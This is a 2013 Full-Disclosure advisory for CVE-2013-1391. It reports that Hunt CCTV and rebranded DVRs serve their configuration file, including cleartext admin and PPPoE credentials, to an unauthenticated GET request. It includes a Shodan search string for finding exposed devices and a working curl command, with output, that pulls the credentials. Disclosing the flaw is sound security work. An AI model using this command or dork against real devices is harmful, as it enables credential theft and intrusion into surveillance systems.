[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] Hunt CCTV (and generics brands) Insufficient Authentication
From: "A. Ramos" <aramosf () gmail ! com>
Date: 2013-01-28 7:41:31
Message-ID: CAHsqx4oeDfCE_ndDSZWM9KQr0Q+t4mLUEu+KTULe4=N4EWpDGw () mail ! gmail ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
Hunt CCTV (and generics brands) Insufficient Authentication
January 17, 2013 - A. Ramos <aramosf @ gmail . com>
-- CVE ID:
CVE-2013-1391 [reserved]
-- Affected Vendors:
Hunt CCTV (http://www.huntcctv.com/)
** generic brands from Hunt **
Capture CCTV (http://www.capturecctv.ca/)
NoVus CCTV (http://www.novuscctv.com/)
Well-Vision Inc (http://well-vision.com/)
-- Affected Models:
DVR-04 / DVR-04CH (HuntCCTV)
DVR-04NC (HuntCCTV)
DVR-08 / DVR-08CH (HuntCCTV)
DVR-08NC (HuntCCTV)
DVR-16 / DVR-16CH (HuntCCTV)
CDR 0410VE (CaptureCCTV-HuntCCTV)
CDR 0820VDE (CaptureCCTV-HuntCCTV)
DR6-704A4H (HuntCCTV)
DR6-708A4H (HuntCCTV)
DR6-7316A4H (HuntCCTV)
DR6-7316A4HL (HuntCCTV)
HDR-04KD (unknown-HuntCCTV)
HDR-08KD (unknown-HuntCCTV)
HV-04RD PRO (Hachi-HuntCCTV)
HV-08RD PRO (Hachi-HuntCCTV)
NV-DVR1204 (NovusSec)
NV-DVR1208 (NovusSec)
NV-DVR1216 (NovusSec)
TW-DVR604 (Well Vision INC Solutions-HuntCCTV)
TW-DVR616 (Well Vision INC Solutions-HuntCCTV)
Shodan dork: Basic realm="DVR" server: httpd -mini
Shodan results: 46890
Vulnerable: >70%
-- Vulnerability Details:
You can get the entire backup config with simple GET. No authentication
required.
All information are in clear text: admin panel, ddns config, ppoe
credentials, misc.
Example:
[aramosf@velouria data]$ curl -v http://x.x.x.x/DVR.cfg | strings |grep -i
USER
* Trying x.x.x.x... connected
* Connected to x.x.x.x (x.x.x.x) port 80 (#0)
> GET /DVR.cfg HTTP/1.1
> User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/
3.13.1.0 zlib/1.2.3 libidn/1.18 libssh2/1.2.2
> Host: x.x.x.x
> Accept: */*
>
< HTTP/1.0 200 Ok
< Server: httpd
< Date: Fri, 17 Jan 2013 05:47:02 GMT
< Cache-Control: no-cache
< Pragma: no-cache
< Expires: 0
< Connection: close
< Content-Type: application/octet-stream
<
USER1_USERNAME=iam
USER1_PASSWORD=sexy
Vulnerable firmware (127 different ones):
- 1.1.10 to 1.1.92
- 1.47 to 1.51
- 2.0.0 to 2.1.93
- 3.0.04 to 3.1.92
-- Disclosure Timeline:
2011-09-?? - Vulnerability discovered
2012-12-20 - Published in the book "Hacker Epico" (
http://www.hackerepico.com)
2013-01-15 - CVE Assigned
2013-01-20 - Vulnerability reported to vendor
2013-01-24 - Vulnerability reported to GDT (Spain)
2013-01-28 - Public disclosure:
http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html
--
Alejandro Ramos
www.securitybydefault.com
[Attachment #5 (text/html)]
<div>Hunt CCTV (and generics brands) Insufficient Authentication</div><div>January 17, 2013 - \
A. Ramos <aramosf @ gmail . com></div><div><br></div><div>-- CVE \
ID:</div><div>CVE-2013-1391 [reserved]</div><div><br></div>
<div>-- Affected Vendors:</div><div>Hunt CCTV (<a href="http://www.huntcctv.com/" \
target="_blank">http://www.huntcctv.com/</a>)</div><div>** generic brands from Hunt \
**</div><div>Capture CCTV (<a href="http://www.capturecctv.ca/" \
target="_blank">http://www.capturecctv.ca/</a>)</div>
<div>NoVus CCTV (<a href="http://www.novuscctv.com/" \
target="_blank">http://www.novuscctv.com/</a>)</div><div>Well-Vision Inc (<a \
href="http://well-vision.com/" target="_blank">http://well-vision.com/</a>)</div><div><br>
</div><div>-- Affected Models:</div>
<div>DVR-04 / DVR-04CH (HuntCCTV)</div><div>DVR-04NC (HuntCCTV)</div><div>DVR-08 / DVR-08CH \
(HuntCCTV)</div><div>DVR-08NC (HuntCCTV)</div><div>DVR-16 / DVR-16CH (HuntCCTV)</div><div>CDR \
0410VE (CaptureCCTV-HuntCCTV)</div>
<div>CDR 0820VDE (CaptureCCTV-HuntCCTV)</div><div>DR6-704A4H (HuntCCTV)</div><div>DR6-708A4H \
(HuntCCTV)</div><div>DR6-7316A4H (HuntCCTV)</div><div>DR6-7316A4HL \
(HuntCCTV)</div><div>HDR-04KD (unknown-HuntCCTV)</div><div>HDR-08KD (unknown-HuntCCTV)</div>
<div>HV-04RD PRO (Hachi-HuntCCTV)</div><div>HV-08RD PRO (Hachi-HuntCCTV)</div><div>NV-DVR1204 \
(NovusSec)</div><div>NV-DVR1208 (NovusSec)</div><div>NV-DVR1216 (NovusSec) </div><div>TW-DVR604 \
(Well Vision INC Solutions-HuntCCTV)</div>
<div>TW-DVR616 (Well Vision INC Solutions-HuntCCTV)</div><div><br></div><div>Shodan dork: Basic \
realm="DVR" server: httpd -mini </div><div>Shodan results: 46890 \
</div><div>Vulnerable: >70% </div><div><br></div>
<div>-- Vulnerability Details:</div><div>You can get the entire backup config with simple GET. \
No authentication required.</div><div>All information are in clear text: admin panel, ddns \
config, ppoe credentials, misc.</div>
<div><br></div><div>Example:</div><div><br></div><div>[aramosf@velouria data]$ curl -v <a \
href="http://x.x.x.x/DVR.cfg" target="_blank">http://x.x.x.x/DVR.cfg</a> | strings |grep -i \
USER</div><div>* Trying x.x.x.x... connected</div>
<div>
* Connected to x.x.x.x (x.x.x.x) port 80 (#0)</div><div>> GET /DVR.cfg \
HTTP/1.1</div><div>> User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/<a \
href="http://3.13.1.0" target="_blank">3.13.1.0</a> zlib/1.2.3 libidn/1.18 libssh2/1.2.2</div>
<div>> Host: x.x.x.x</div><div>> Accept: */*</div><div>></div><div>< HTTP/1.0 200 \
Ok</div><div>< Server: httpd</div><div>< Date: Fri, 17 Jan 2013 05:47:02 \
GMT</div><div>< Cache-Control: no-cache</div>
<div>< Pragma: no-cache</div><div>< Expires: 0</div><div>< Connection: \
close</div><div>< Content-Type: \
application/octet-stream</div><div><</div><div>USER1_USERNAME=iam<span \
style="white-space:pre-wrap"> </span></div>
<div>USER1_PASSWORD=sexy</div><div><br></div><div>Vulnerable firmware (127 different \
ones):</div><div> - 1.1.10 to 1.1.92 </div><div> - 1.47 to 1.51</div><div> - 2.0.0 to \
2.1.93</div><div> - 3.0.04 to 3.1.92</div><div>
</div><div>-- Disclosure Timeline:</div><div>2011-09-?? - Vulnerability \
discovered</div><div>2012-12-20 - Published in the book "Hacker Epico" (<a \
href="http://www.hackerepico.com" target="_blank">http://www.hackerepico.com</a>)</div>
<div>2013-01-15 - CVE Assigned</div><div>2013-01-20 - Vulnerability reported to \
vendor</div><div>2013-01-24 - Vulnerability reported to GDT (Spain)</div><div><div>2013-01-28 - \
Public disclosure: <a \
href="http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html" \
target="_blank">http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html</a></div>
</div><div><br></div><div>-- </div>Alejandro Ramos<br><a \
href="http://www.securitybydefault.com" target="_blank">www.securitybydefault.com</a>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic